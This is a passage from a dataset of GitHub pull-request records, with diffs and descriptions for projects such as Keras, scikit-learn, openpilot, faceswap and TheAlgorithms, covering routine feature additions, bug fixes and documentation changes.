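print(t in {COMMENT, STANDALONE_COMMENT})       # True
```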
Correct me if this isn't a bug.
Thanks | https://api.github.com/repos/psf/black/pulls/929 | 2019-07-18T12:35:14Z | 2019-10-20T14:52:08Z | 2019-10-20T14:52:08Z | 2019-10-20T14:52:08Z | 146 | psf/black | 23,703 |
Add ONNX-Scala and NDScala to Scala list | diff --git a/README.md b/README.md
index 8011fe1d..e664edb3 100644
--- a/README.md
+++ b/README.md
@@ -1558,6 +1558,7 @@ be
<a name="scala-data-analysis--data-visualization"></a>
#### Data Analysis / Data Visualization
+* [NDScala](https://github.com/SciScala/NDScala) - N-dimensional arrays in Scala 3. Think NumPy ndarray, but with compile-time type-checking/inference over shapes, tensor/axis labels & numeric data types
* [MLlib in Apache Spark](https://spark.apache.org/docs/latest/mllib-guide.html) - Distributed machine learning library in Spark
* [Hydrosphere Mist](https://github.com/Hydrospheredata/mist) - a service for deployment Apache Spark MLLib machine learning models as realtime, batch or reactive web services.
* [Scalding](https://github.com/twitter/scalding) - A Scala API for Cascading.
@@ -1572,6 +1573,7 @@ be
<a name="scala-general-purpose-machine-learning"></a>
#### General-Purpose Machine Learning
+* [ONNX-Scala](https://github.com/EmergentOrder/onnx-scala) - An ONNX (Open Neural Network eXchange) API and backend for typeful, functional deep learning in Scala (3).
* [DeepLearning.scala](https://deeplearning.thoughtworks.school/) - Creating statically typed dynamic neural networks from object-oriented & functional programming constructs.
* [Conjecture](https://github.com/etsy/Conjecture) - Scalable Machine Learning in Scalding.
* [brushfire](https://github.com/stripe/brushfire) - Distributed decision tree ensemble learning in Scala.
| https://api.github.com/repos/josephmisiti/awesome-machine-learning/pulls/792 | 2021-04-15T12:07:07Z | 2021-04-15T14:25:31Z | 2021-04-15T14:25:31Z | 2021-04-15T14:25:31Z | 385 | josephmisiti/awesome-machine-learning | 52,370 |
|
Revert use of celery task for Discord notifications | diff --git a/backend/oasst_backend/prompt_repository.py b/backend/oasst_backend/prompt_repository.py
index 1ce0cab569..d5f1a477aa 100644
--- a/backend/oasst_backend/prompt_repository.py
+++ b/backend/oasst_backend/prompt_repository.py
@@ -30,8 +30,8 @@
from oasst_backend.models.payload_column_type import PayloadContainer
from oasst_backend.task_repository import TaskRepository, validate_frontend_message_id
from oasst_backend.user_repository import UserRepository
+from oasst_backend.utils import discord
from oasst_backend.utils.database_utils import CommitMode, db_lang_to_postgres_ts_lang, managed_tx_method
-from oasst_backend.utils.discord import send_new_report_message
from oasst_shared.exceptions import OasstError, OasstErrorCode
from oasst_shared.schemas import protocol as protocol_schema
from oasst_shared.schemas.protocol import SystemStats
@@ -595,7 +595,7 @@ def store_text_labels(self, text_labels: protocol_schema.TextLabels) -> tuple[Te
message_id, protocol_schema.EmojiOp.add, protocol_schema.EmojiCode.red_flag
)
- send_new_report_message.delay(message=message, label_text=text_labels.text, user_id=self.user_id)
+ discord.send_new_report_message(message=message, label_text=text_labels.text, user_id=self.user_id)
# update existing record for repeated updates (same user no task associated)
existing_text_label = self.fetch_non_task_text_labels(message_id, self.user_id)
diff --git a/backend/oasst_backend/utils/discord.py b/backend/oasst_backend/utils/discord.py
index 464ff6ae7a..3f8f5f62b6 100644
--- a/backend/oasst_backend/utils/discord.py
+++ b/backend/oasst_backend/utils/discord.py
@@ -2,18 +2,15 @@
import requests
from loguru import logger
-from oasst_backend.celery_worker import app as celery_app
from oasst_backend.config import settings
from oasst_backend.models.message import Message
ROOT_ENDPOINT = "https://discord.com/api/v10"
-@celery_app.task(name="send_new_report_message")
def send_new_report_message(message: Message, label_text: str, user_id: UUID):
"""
Send a message to the Discord channel when a new message is flagged.
- Note: this is a Celery task.
Args:
message (Message): the flagged message
diff --git a/backend/update_message_attributes.py b/backend/update_message_attributes.py
index 0290e029d1..8e09c92ab3 100644
--- a/backend/update_message_attributes.py
+++ b/backend/update_message_attributes.py
@@ -2,7 +2,7 @@
from loguru import logger
from oasst_backend.models import ApiClient, Message
-from oasst_backend.scheduled_tasks import check_toxicity, hf_feature_extraction
+from oasst_backend.scheduled_tasks import hf_feature_extraction, toxicity
from oasst_backend.utils.database_utils import default_session_factory
from sqlmodel import text
@@ -71,7 +71,7 @@ def find_and_update_toxicity(message_ids):
text = result.payload.payload.text
api_client = session.query(ApiClient).filter(ApiClient.id == api_client_id).first()
if api_client is not None and text is not None:
- check_toxicity(text=text, message_id=message_id, api_client=api_client.__dict__)
+ toxicity(text=text, message_id=message_id, api_client=api_client.__dict__)
# to not get rate limited from HF
time.sleep(10)
except Exception as e:
| Should fix #3504 | https://api.github.com/repos/LAION-AI/Open-Assistant/pulls/3516 | 2023-06-25T10:15:28Z | 2023-06-25T13:12:04Z | 2023-06-25T13:12:04Z | 2023-06-25T13:12:05Z | 804 | LAION-AI/Open-Assistant | 36,851 |
Add map, foldl, foldr to the backend | diff --git a/keras/backend/tensorflow_backend.py b/keras/backend/tensorflow_backend.py
index 03dd2e552af..2abaf50769f 100644
--- a/keras/backend/tensorflow_backend.py
+++ b/keras/backend/tensorflow_backend.py
@@ -1974,3 +1974,52 @@ def ctc_decode(y_pred, input_length, greedy=True, beam_width=100,
for st in decoded]
return (decoded_dense, log_prob)
+
+
+# HIGH ORDER FUNCTIONS
+
+def map_fn(fn, elems, name=None):
+ '''Map the function fn over the elements elems and return the outputs.
+
+ # Arguments
+ fn: Callable that will be called upon each element in elems
+ elems: tensor
+ name: A string name for the map node in the graph
+
+ # Returns
+        Tensor whose first dimension equals that of elems and whose
+        remaining dimensions are determined by fn
+ '''
+ return tf.map_fn(fn, elems, name=name)
+
+
+def foldl(fn, elems, initializer=None, name=None):
+ '''Reduce elems using fn to combine them from left to right.
+
+ # Arguments
+ fn: Callable that will be called upon each element in elems and an
+ accumulator, for instance lambda acc, x: acc + x
+ elems: tensor
+ initializer: The first value used (elems[0] in case of None)
+ name: A string name for the foldl node in the graph
+
+ # Returns
+ Same type and shape as initializer
+ '''
+ return tf.foldl(fn, elems, initializer=initializer, name=name)
+
+
+def foldr(fn, elems, initializer=None, name=None):
+ '''Reduce elems using fn to combine them from right to left.
+
+ # Arguments
+ fn: Callable that will be called upon each element in elems and an
+ accumulator, for instance lambda acc, x: acc + x
+ elems: tensor
+ initializer: The first value used (elems[-1] in case of None)
+ name: A string name for the foldr node in the graph
+
+ # Returns
+ Same type and shape as initializer
+ '''
+ return tf.foldr(fn, elems, initializer=initializer, name=name)
diff --git a/keras/backend/theano_backend.py b/keras/backend/theano_backend.py
index 2cd3c7a4bde..33388fd22a2 100644
--- a/keras/backend/theano_backend.py
+++ b/keras/backend/theano_backend.py
@@ -1851,3 +1851,68 @@ def ctc_step(y_true_step, y_pred_step, input_length_step, label_length_step):
ret = ret.dimshuffle('x', 0)
return ret
+
+
+# HIGH ORDER FUNCTIONS
+
+def map_fn(fn, elems, name=None):
+ '''Map the function fn over the elements elems and return the outputs.
+
+ # Arguments
+ fn: Callable that will be called upon each element in elems
+ elems: tensor, at least 2 dimensional
+ name: A string name for the map node in the graph
+
+ # Returns
+        Tensor whose first dimension equals that of elems and whose
+        remaining dimensions are determined by fn
+ '''
+ return theano.map(fn, elems, name=name)[0]
+
+
+def foldl(fn, elems, initializer=None, name=None):
+ '''Reduce elems using fn to combine them from left to right.
+
+ # Arguments
+ fn: Callable that will be called upon each element in elems and an
+ accumulator, for instance lambda acc, x: acc + x
+ elems: tensor
+ initializer: The first value used (elems[0] in case of None)
+ name: A string name for the foldl node in the graph
+
+ # Returns
+ Same type and shape as initializer
+ '''
+ if initializer is None:
+ initializer = elems[0]
+ elems = elems[1:]
+
+ # We need to change the order of the arguments because theano accepts x as
+ # first parameter and accumulator as second
+ fn2 = lambda x, acc: fn(acc, x)
+
+ return theano.foldl(fn2, elems, initializer, name=name)[0]
+
+
+def foldr(fn, elems, initializer=None, name=None):
+ '''Reduce elems using fn to combine them from right to left.
+
+ # Arguments
+ fn: Callable that will be called upon each element in elems and an
+ accumulator, for instance lambda acc, x: acc + x
+ elems: tensor
+ initializer: The first value used (elems[-1] in case of None)
+ name: A string name for the foldr node in the graph
+
+ # Returns
+ Same type and shape as initializer
+ '''
+ if initializer is None:
+ initializer = elems[-1]
+ elems = elems[:-1]
+
+ # We need to change the order of the arguments because theano accepts x as
+ # first parameter and accumulator as second
+ fn2 = lambda x, acc: fn(acc, x)
+
+ return theano.foldr(fn2, elems, initializer, name=name)[0]
diff --git a/tests/keras/backend/test_backends.py b/tests/keras/backend/test_backends.py
index cc9bf422f0c..35a76a7e59c 100644
--- a/tests/keras/backend/test_backends.py
+++ b/tests/keras/backend/test_backends.py
@@ -881,6 +881,35 @@ def test_sparse_concat(self):
assert k_s_d.shape == k_d.shape
assert_allclose(k_s_d, k_d, atol=1e-05)
+ def test_map(self):
+ x = np.random.rand(10, 3).astype(np.float32)
+ for K in [KTF, KTH]:
+ kx = K.eval(K.map_fn(K.sum, x))
+
+ assert (10,) == kx.shape
+ assert_allclose(x.sum(axis=1), kx, atol=1e-05)
+
+ def test_foldl(self):
+ x = np.random.rand(10, 3).astype(np.float32)
+ for K in [KTF, KTH]:
+ kx = K.eval(K.foldl(lambda a, b: a+b, x))
+
+ assert (3,) == kx.shape
+ assert_allclose(x.sum(axis=0), kx, atol=1e-05)
+
+ def test_foldr(self):
+ # This test aims to make sure that we walk the array from right to left
+ # and checks it in the following way: multiplying left to right 1e-40
+ # cannot be held into a float32 so it causes an underflow while from
+ # right to left we have no such problem and the result is larger
+ x = np.array([1e-20, 1e-20, 10, 10, 10], dtype=np.float32)
+ for K in [KTF, KTH]:
+ p1 = K.eval(K.foldl(lambda a, b: a*b, x))
+ p2 = K.eval(K.foldr(lambda a, b: a*b, x))
+
+ assert p1 < p2
+ assert 9e-38 < p2 <= 1e-37
+
if __name__ == '__main__':
pytest.main([__file__])
| Hi, this is in reference to #4434.
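A minimal usage sketch of the new backend functions (assuming the TensorFlow backend; values are illustrative):

```python
import numpy as np
from keras import backend as K

x = K.variable(np.arange(12, dtype="float32").reshape(4, 3))

row_sums = K.map_fn(K.sum, x)                      # one scalar per row -> shape (4,)
total = K.foldl(lambda acc, v: acc + v, row_sums)  # left fold into a scalar

print(K.eval(row_sums))  # [ 3. 12. 21. 30.]
print(K.eval(total))     # 66.0
```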
Tell me if it needs anything more. I believe `K.rnn` is really unintuitive to use for simple maps and folds, if it can even be used for them. | https://api.github.com/repos/keras-team/keras/pulls/4461 | 2016-11-21T21:28:38Z | 2016-11-23T21:21:13Z | 2016-11-23T21:21:13Z | 2016-11-29T18:23:50Z | 1,693 | keras-team/keras | 47,762
modified the proxy.py. | diff --git a/proxy.py b/proxy.py
index 4c5b4cc0..a60b1f53 100644
--- a/proxy.py
+++ b/proxy.py
@@ -5,7 +5,6 @@
class SalesManager:
-
def work(self):
print("Sales Manager working...")
@@ -14,7 +13,6 @@ def talk(self):
class Proxy:
-
def __init__(self):
self.busy = 'No'
self.sales = None
@@ -30,14 +28,32 @@ def work(self):
print("Sales Manager is busy")
+class NoTalkProxy(Proxy):
+ def __init__(self):
+ Proxy.__init__(self)
+
+ def work(self):
+ print("Proxy checking for Sales Manager availability")
+ time.sleep(2)
+ print("This Sales Manager will not talk to you whether he/she is busy or not")
+
+
if __name__ == '__main__':
p = Proxy()
p.work()
p.busy = 'Yes'
p.work()
+ p = NoTalkProxy()
+ p.work()
+ p.busy = 'Yes'
+ p.work()
### OUTPUT ###
# Proxy checking for Sales Manager availability
# Sales Manager ready to talk
# Proxy checking for Sales Manager availability
# Sales Manager is busy
+# Proxy checking for Sales Manager availability
+# This Sales Manager will not talk to you whether he/she is busy or not
+# Proxy checking for Sales Manager availability
+# This Sales Manager will not talk to you whether he/she is busy or not
| This modification shows that a proxy can be used to block some operations of the underlying object. It is a small change, but useful for illustrating the pattern.
| https://api.github.com/repos/faif/python-patterns/pulls/81 | 2015-04-18T05:50:28Z | 2015-04-22T16:35:30Z | 2015-04-22T16:35:30Z | 2015-04-22T16:35:30Z | 347 | faif/python-patterns | 33,433 |
Pi digit extraction algorithm | diff --git a/DIRECTORY.md b/DIRECTORY.md
index f4499d8e07bd..bef7bca86cc3 100644
--- a/DIRECTORY.md
+++ b/DIRECTORY.md
@@ -300,6 +300,7 @@
* [Average Mean](https://github.com/TheAlgorithms/Python/blob/master/maths/average_mean.py)
* [Average Median](https://github.com/TheAlgorithms/Python/blob/master/maths/average_median.py)
* [Average Mode](https://github.com/TheAlgorithms/Python/blob/master/maths/average_mode.py)
+ * [Bailey Borwein Plouffe](https://github.com/TheAlgorithms/Python/blob/master/maths/bailey_borwein_plouffe.py)
* [Basic Maths](https://github.com/TheAlgorithms/Python/blob/master/maths/basic_maths.py)
* [Binary Exp Mod](https://github.com/TheAlgorithms/Python/blob/master/maths/binary_exp_mod.py)
* [Binary Exponentiation](https://github.com/TheAlgorithms/Python/blob/master/maths/binary_exponentiation.py)
@@ -603,6 +604,7 @@
* [Shell Sort](https://github.com/TheAlgorithms/Python/blob/master/sorts/shell_sort.py)
* [Sleep Sort](https://github.com/TheAlgorithms/Python/blob/master/sorts/sleep_sort.py)
* [Stooge Sort](https://github.com/TheAlgorithms/Python/blob/master/sorts/stooge_sort.py)
+ * [Strand Sort](https://github.com/TheAlgorithms/Python/blob/master/sorts/strand_sort.py)
* [Tim Sort](https://github.com/TheAlgorithms/Python/blob/master/sorts/tim_sort.py)
* [Topological Sort](https://github.com/TheAlgorithms/Python/blob/master/sorts/topological_sort.py)
* [Tree Sort](https://github.com/TheAlgorithms/Python/blob/master/sorts/tree_sort.py)
diff --git a/maths/bailey_borwein_plouffe.py b/maths/bailey_borwein_plouffe.py
new file mode 100644
index 000000000000..7834668864af
--- /dev/null
+++ b/maths/bailey_borwein_plouffe.py
@@ -0,0 +1,87 @@
+def bailey_borwein_plouffe(digit_position: int, precision: int = 1000) -> str:
+ """
+ Implement a popular pi-digit-extraction algorithm known as the
+ Bailey-Borwein-Plouffe (BBP) formula to calculate the nth hex digit of pi.
+ Wikipedia page:
+ https://en.wikipedia.org/wiki/Bailey%E2%80%93Borwein%E2%80%93Plouffe_formula
+ @param digit_position: a positive integer representing the position of the digit to extract.
+ The digit immediately after the decimal point is located at position 1.
+ @param precision: number of terms in the second summation to calculate.
+ A higher number reduces the chance of an error but increases the runtime.
+ @return: a hexadecimal digit representing the digit at the nth position
+ in pi's decimal expansion.
+
+ >>> "".join(bailey_borwein_plouffe(i) for i in range(1, 11))
+ '243f6a8885'
+ >>> bailey_borwein_plouffe(5, 10000)
+ '6'
+ >>> bailey_borwein_plouffe(-10)
+ Traceback (most recent call last):
+ ...
+ ValueError: Digit position must be a positive integer
+ >>> bailey_borwein_plouffe(0)
+ Traceback (most recent call last):
+ ...
+ ValueError: Digit position must be a positive integer
+ >>> bailey_borwein_plouffe(1.7)
+ Traceback (most recent call last):
+ ...
+ ValueError: Digit position must be a positive integer
+ >>> bailey_borwein_plouffe(2, -10)
+ Traceback (most recent call last):
+ ...
+ ValueError: Precision must be a nonnegative integer
+ >>> bailey_borwein_plouffe(2, 1.6)
+ Traceback (most recent call last):
+ ...
+ ValueError: Precision must be a nonnegative integer
+ """
+ if (not isinstance(digit_position, int)) or (digit_position <= 0):
+ raise ValueError("Digit position must be a positive integer")
+ elif (not isinstance(precision, int)) or (precision < 0):
+        raise ValueError("Precision must be a nonnegative integer")
+
+ # compute an approximation of (16 ** (n - 1)) * pi whose fractional part is mostly accurate
+ sum_result = (
+ 4 * _subsum(digit_position, 1, precision)
+ - 2 * _subsum(digit_position, 4, precision)
+ - _subsum(digit_position, 5, precision)
+ - _subsum(digit_position, 6, precision)
+ )
+
+ # return the first hex digit of the fractional part of the result
+ return hex(int((sum_result % 1) * 16))[2:]
+
+
+def _subsum(
+ digit_pos_to_extract: int, denominator_addend: int, precision: int
+) -> float:
+ # only care about first digit of fractional part; don't need decimal
+ """
+ Private helper function to implement the summation
+ functionality.
+ @param digit_pos_to_extract: digit position to extract
+ @param denominator_addend: added to denominator of fractions in the formula
+ @param precision: same as precision in main function
+ @return: floating-point number whose integer part is not important
+ """
+ sum = 0.0
+ for sum_index in range(digit_pos_to_extract + precision):
+ denominator = 8 * sum_index + denominator_addend
+ exponential_term = 0.0
+ if sum_index < digit_pos_to_extract:
+ # if the exponential term is an integer and we mod it by the denominator before
+ # dividing, only the integer part of the sum will change; the fractional part will not
+ exponential_term = pow(
+ 16, digit_pos_to_extract - 1 - sum_index, denominator
+ )
+ else:
+ exponential_term = pow(16, digit_pos_to_extract - 1 - sum_index)
+ sum += exponential_term / denominator
+ return sum
+
+
+if __name__ == "__main__":
+ import doctest
+
+ doctest.testmod()
| ### **Describe your change:**
I added an algorithm that extracts the nth hexadecimal digit of pi
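For reference, the implementation evaluates the Bailey-Borwein-Plouffe formula

$$\pi = \sum_{k=0}^{\infty} \frac{1}{16^{k}} \left( \frac{4}{8k+1} - \frac{2}{8k+4} - \frac{1}{8k+5} - \frac{1}{8k+6} \right)$$

whose base-16 structure is what makes it possible to extract the nth hexadecimal digit without computing the preceding digits.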
* [X] Add an algorithm?
* [ ] Fix a bug or typo in an existing algorithm?
* [ ] Documentation change?
### **Checklist:**
* [X] I have read [CONTRIBUTING.md](https://github.com/TheAlgorithms/Python/blob/master/CONTRIBUTING.md).
* [X] This pull request is all my own work -- I have not plagiarized.
* [X] I know that pull requests will not be merged if they fail the automated tests.
* [X] This PR only changes one algorithm file. To ease review, please open separate PRs for separate algorithms.
* [X] All new Python files are placed inside an existing directory.
* [X] All filenames are in all lowercase characters with no spaces or dashes.
* [X] All functions and variable names follow Python naming conventions.
* [X] All function parameters and return values are annotated with Python [type hints](https://docs.python.org/3/library/typing.html).
* [X] All functions have [doctests](https://docs.python.org/3/library/doctest.html) that pass the automated testing.
* [X] All new algorithms have a URL in its comments that points to Wikipedia or other similar explanation.
* [X] If this pull request resolves one or more open issues then the commit message contains `Fixes: #{$ISSUE_NO}`.
| https://api.github.com/repos/TheAlgorithms/Python/pulls/1996 | 2020-05-18T06:55:30Z | 2020-05-18T20:54:09Z | 2020-05-18T20:54:09Z | 2020-05-18T20:54:09Z | 1,510 | TheAlgorithms/Python | 30,067 |
Update synthesizer/train.py, vocoder/train.py, synthesizer/synthesize.py, vocoder_preprocess.py to Allow Vocoder_preprocess to Work (Win10 GPU) | diff --git a/README.md b/README.md
index 214e9b3ef..454fb79c7 100644
--- a/README.md
+++ b/README.md
@@ -38,7 +38,7 @@ SV2TTS is a three-stage deep learning framework that allows to create a numerica
**Python 3.6 or 3.7** is needed to run the toolbox.
-* Install [PyTorch](https://pytorch.org/get-started/locally/) (>=1.0.1).
+* Install [PyTorch](https://pytorch.org/get-started/locally/) (>=1.1.0).
* Install [ffmpeg](https://ffmpeg.org/download.html#get-packages).
* Run `pip install -r requirements.txt` to install the remaining necessary packages.
diff --git a/demo_cli.py b/demo_cli.py
index c7309e8e2..d43f04d72 100644
--- a/demo_cli.py
+++ b/demo_cli.py
@@ -43,7 +43,7 @@
if args.cpu:
# Hide GPUs from Pytorch to force CPU processing
- os.environ["CUDA_VISIBLE_DEVICES"] = ""
+ os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
if not args.no_mp3_support:
try:
diff --git a/demo_toolbox.py b/demo_toolbox.py
index d93803141..ea30a2927 100644
--- a/demo_toolbox.py
+++ b/demo_toolbox.py
@@ -32,7 +32,7 @@
if args.cpu:
# Hide GPUs from Pytorch to force CPU processing
- os.environ["CUDA_VISIBLE_DEVICES"] = ""
+ os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
del args.cpu
## Remind the user to download pretrained models if needed
diff --git a/synthesizer/synthesize.py b/synthesizer/synthesize.py
index ff05d0eb8..ffc7dc267 100644
--- a/synthesizer/synthesize.py
+++ b/synthesizer/synthesize.py
@@ -8,13 +8,13 @@
import numpy as np
from pathlib import Path
from tqdm import tqdm
-
+import platform
def run_synthesis(in_dir, out_dir, model_dir, hparams):
# This generates ground truth-aligned mels for vocoder training
synth_dir = Path(out_dir).joinpath("mels_gta")
synth_dir.mkdir(exist_ok=True)
- print(hparams_debug_string(hparams))
+ print(hparams_debug_string())
# Check for GPU
if torch.cuda.is_available():
@@ -62,9 +62,9 @@ def run_synthesis(in_dir, out_dir, model_dir, hparams):
dataset = SynthesizerDataset(metadata_fpath, mel_dir, embed_dir, hparams)
data_loader = DataLoader(dataset,
- collate_fn=lambda batch: collate_synthesizer(batch, r),
+ collate_fn=lambda batch: collate_synthesizer(batch, r, hparams),
batch_size=hparams.synthesis_batch_size,
- num_workers=2,
+ num_workers=2 if platform.system() != "Windows" else 0,
shuffle=False,
pin_memory=True)
@@ -80,7 +80,7 @@ def run_synthesis(in_dir, out_dir, model_dir, hparams):
if device.type == "cuda" and torch.cuda.device_count() > 1:
_, mels_out, _ = data_parallel_workaround(model, texts, mels, embeds)
else:
- _, mels_out, _ = model(texts, mels, embeds)
+ _, mels_out, _, _ = model(texts, mels, embeds)
for j, k in enumerate(idx):
# Note: outputs mel-spectrogram files and target ones have same names, just different folders
diff --git a/synthesizer/train.py b/synthesizer/train.py
index 786e5d0d6..a136cf9b3 100644
--- a/synthesizer/train.py
+++ b/synthesizer/train.py
@@ -15,6 +15,7 @@
from pathlib import Path
import sys
import time
+import platform
def np_now(x: torch.Tensor): return x.detach().cpu().numpy()
@@ -146,7 +147,7 @@ def train(run_id: str, syn_dir: str, models_dir: str, save_every: int,
data_loader = DataLoader(dataset,
collate_fn=lambda batch: collate_synthesizer(batch, r, hparams),
batch_size=batch_size,
- num_workers=2,
+ num_workers=2 if platform.system() != "Windows" else 0,
shuffle=True,
pin_memory=True)
diff --git a/vocoder/train.py b/vocoder/train.py
index 491246937..6dc2f892e 100644
--- a/vocoder/train.py
+++ b/vocoder/train.py
@@ -11,7 +11,7 @@
import numpy as np
import time
import torch
-
+import platform
def train(run_id: str, syn_dir: Path, voc_dir: Path, models_dir: Path, ground_truth: bool,
save_every: int, backup_every: int, force_restart: bool):
@@ -79,7 +79,7 @@ def train(run_id: str, syn_dir: Path, voc_dir: Path, models_dir: Path, ground_tr
data_loader = DataLoader(dataset,
collate_fn=collate_vocoder,
batch_size=hp.voc_batch_size,
- num_workers=2,
+ num_workers=2 if platform.system() != "Windows" else 0,
shuffle=True,
pin_memory=True)
start = time.time()
diff --git a/vocoder_preprocess.py b/vocoder_preprocess.py
index 0828d72e4..7ede3dfb9 100644
--- a/vocoder_preprocess.py
+++ b/vocoder_preprocess.py
@@ -43,7 +43,7 @@ class MyFormatter(argparse.ArgumentDefaultsHelpFormatter, argparse.RawDescriptio
if args.cpu:
# Hide GPUs from Pytorch to force CPU processing
- os.environ["CUDA_VISIBLE_DEVICES"] = ""
+ os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
# Verify webrtcvad is available
if not args.no_trim:
| Pull requested by @blue-fish.
@tomcattwo edited `synthesizer/train.py` per issue #669 and blue-fish/Real-Time-Voice-Cloning@89a9964 to fix the Win10 pickle issue. The core of the fix is the same `num_workers` pattern in each affected `DataLoader` call.
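A minimal, self-contained sketch of that pattern (the dataset here is a stand-in):

```python
import platform

import torch
from torch.utils.data import DataLoader, TensorDataset

# On Windows, DataLoader workers are spawned by pickling the dataset and
# collate_fn; unpicklable callables, such as the lambda collate functions
# used in the synthesizer, fail there, so worker processes are disabled.
num_workers = 2 if platform.system() != "Windows" else 0

dataset = TensorDataset(torch.arange(8).float())  # stand-in dataset
loader = DataLoader(dataset, batch_size=2, num_workers=num_workers)
for (batch,) in loader:
    print(batch)
```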
This will allow Windows users using a GPU to properly run synthesizer training. | https://api.github.com/repos/CorentinJ/Real-Time-Voice-Cloning/pulls/838 | 2021-09-01T16:02:55Z | 2021-09-25T16:57:12Z | 2021-09-25T16:57:12Z | 2021-09-25T16:57:30Z | 1,400 | CorentinJ/Real-Time-Voice-Cloning | 27,390 |
fixup release files | diff --git a/release/build_release3.sh b/release/build_release3.sh
index 35f17d0cec4b16..5664d984f7fbf3 100755
--- a/release/build_release3.sh
+++ b/release/build_release3.sh
@@ -1,8 +1,10 @@
#!/usr/bin/bash -e
+# git diff --name-status origin/release3-staging | grep "^A" | less
+
DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" >/dev/null && pwd)"
-BUILD_DIR=/data/releasepilot
+BUILD_DIR=/data/openpilot
SOURCE_DIR="$(git rev-parse --show-toplevel)"
BRANCH=release3-staging
diff --git a/release/files_common b/release/files_common
index ae126effe80363..3a52a9f715c75e 100644
--- a/release/files_common
+++ b/release/files_common
@@ -436,7 +436,10 @@ selfdrive/modeld/runners/run.h
selfdrive/monitoring/dmonitoringd.py
selfdrive/monitoring/driver_monitor.py
+selfdrive/assets/.gitignore
+selfdrive/assets/assets.qrc
selfdrive/assets/*.png
+selfdrive/assets/*.svg
selfdrive/assets/fonts/*.ttf
selfdrive/assets/images/*
selfdrive/assets/offroad/*
diff --git a/release/files_tici b/release/files_tici
index 14fdf252e70760..bf4e3afb589799 100644
--- a/release/files_tici
+++ b/release/files_tici
@@ -1,5 +1,9 @@
installer/continue_openpilot.sh
+phonelibs/mapbox-gl-native-qt/include/*
+
+selfdrive/timezoned.py
+
selfdrive/assets/navigation/*
selfdrive/assets/training_wide/*
@@ -15,4 +19,7 @@ selfdrive/hardware/tici/agnos.py
selfdrive/hardware/tici/agnos.json
selfdrive/hardware/tici/amplifier.py
-selfdrive/timezoned.py
+selfdrive/ui/qt/spinner_larch64
+selfdrive/ui/qt/text_larch64
+selfdrive/ui/qt/maps/*.cc
+selfdrive/ui/qt/maps/*.h
| https://api.github.com/repos/commaai/openpilot/pulls/21638 | 2021-07-18T00:17:19Z | 2021-07-18T00:24:09Z | 2021-07-18T00:24:09Z | 2021-07-18T00:24:09Z | 471 | commaai/openpilot | 9,329 |
|
Allows applying dilation by passing negative erosion kernel values. If value is negative, … | diff --git a/plugins/Convert_Masked.py b/plugins/Convert_Masked.py
index d54a534f33..d2f6fc2c22 100644
--- a/plugins/Convert_Masked.py
+++ b/plugins/Convert_Masked.py
@@ -8,11 +8,13 @@
class Convert():
def __init__(self, encoder, blur_size=2, seamless_clone=False, mask_type="facehullandrect", erosion_kernel_size=None, **kwargs):
self.encoder = encoder
-
self.erosion_kernel = None
+ self.erosion_kernel_size = erosion_kernel_size
if erosion_kernel_size is not None:
- self.erosion_kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(erosion_kernel_size,erosion_kernel_size))
-
+ if erosion_kernel_size > 0:
+ self.erosion_kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(erosion_kernel_size,erosion_kernel_size))
+ elif erosion_kernel_size < 0:
+ self.erosion_kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(abs(erosion_kernel_size),abs(erosion_kernel_size)))
self.blur_size = blur_size
self.seamless_clone = seamless_clone
self.mask_type = mask_type.lower() # Choose in 'FaceHullAndRect','FaceHull','Rect'
@@ -86,7 +88,11 @@ def get_image_mask(self, image, new_face, face_detected, mat, image_size):
if self.erosion_kernel is not None:
- image_mask = cv2.erode(image_mask,self.erosion_kernel,iterations = 1)
+ if self.erosion_kernel_size > 0:
+ image_mask = cv2.erode(image_mask,self.erosion_kernel,iterations = 1)
+ elif self.erosion_kernel_size < 0:
+ dilation_kernel = abs(self.erosion_kernel)
+ image_mask = cv2.dilate(image_mask,dilation_kernel,iterations = 1)
if self.blur_size!=0:
image_mask = cv2.blur(image_mask,(self.blur_size,self.blur_size))
diff --git a/scripts/convert.py b/scripts/convert.py
index dbde363d9b..f10ffba7bf 100644
--- a/scripts/convert.py
+++ b/scripts/convert.py
@@ -97,7 +97,8 @@ def add_optional_arguments(self, parser):
dest="erosion_kernel_size",
type=int,
default=None,
- help="Erosion kernel size. (Masked converter only)")
+ help="Erosion kernel size. (Masked converter only). Positive values apply erosion which reduces the edge \
+ of the swapped face. Negative values apply dilation which allows the swapped face to cover more space.")
parser.add_argument('-sm', '--smooth-mask',
action="store_true",
| …it turns it into a dilation kernel, which allows facehullandrect to cover more space. Can help to cover double eyebrows. Also could be useful with Masked converter for GAN in @oatssss PR. | https://api.github.com/repos/deepfakes/faceswap/pulls/238 | 2018-03-03T03:43:39Z | 2018-03-03T11:01:08Z | 2018-03-03T11:01:08Z | 2018-03-03T20:47:47Z | 647 | deepfakes/faceswap | 18,819 |
DOC remove unimplemented misclassification criterion from user guide | diff --git a/doc/modules/tree.rst b/doc/modules/tree.rst
index 951bab0e815b1..6cf8e0d8f5a9a 100644
--- a/doc/modules/tree.rst
+++ b/doc/modules/tree.rst
@@ -500,12 +500,6 @@ Entropy:
H(Q_m) = - \sum_k p_{mk} \log(p_{mk})
-Misclassification:
-
-.. math::
-
- H(Q_m) = 1 - \max(p_{mk})
-
Regression criteria
-------------------
| We do not implement this criterion in scikit-learn.
This part of the scikit-learn user guide uses the notation and criterion presented on page 309 of the [ESLII](https://hastie.su.domains/Papers/ESLII.pdf), but it is not aligned with the list of options actually implemented in scikit-learn.
If we ever decide to implement it, we can always re-add this doc, but I suspect this is a YAGNI. | https://api.github.com/repos/scikit-learn/scikit-learn/pulls/23071 | 2022-04-07T13:03:02Z | 2022-04-07T14:01:13Z | 2022-04-07T14:01:13Z | 2022-04-07T15:11:24Z | 127 | scikit-learn/scikit-learn | 46,067
Restructure for text parsing. Faster, more stable, more maintainable | diff --git a/share/adapters/oeis.sh b/share/adapters/oeis.sh
index 7d996904..fc5136af 100755
--- a/share/adapters/oeis.sh
+++ b/share/adapters/oeis.sh
@@ -8,148 +8,173 @@
# oeis <sequence ID> <language>
# oeis <val_a, val_b, val_c, ...>
oeis() (
- local URL='https://oeis.org'
+ local URL='https://oeis.org/search?q='
local TMP=/tmp/oeis
local DOC=/tmp/oeis/doc.html
- local MAX_TERMS=10
+ local MAX_TERMS_LONG=30
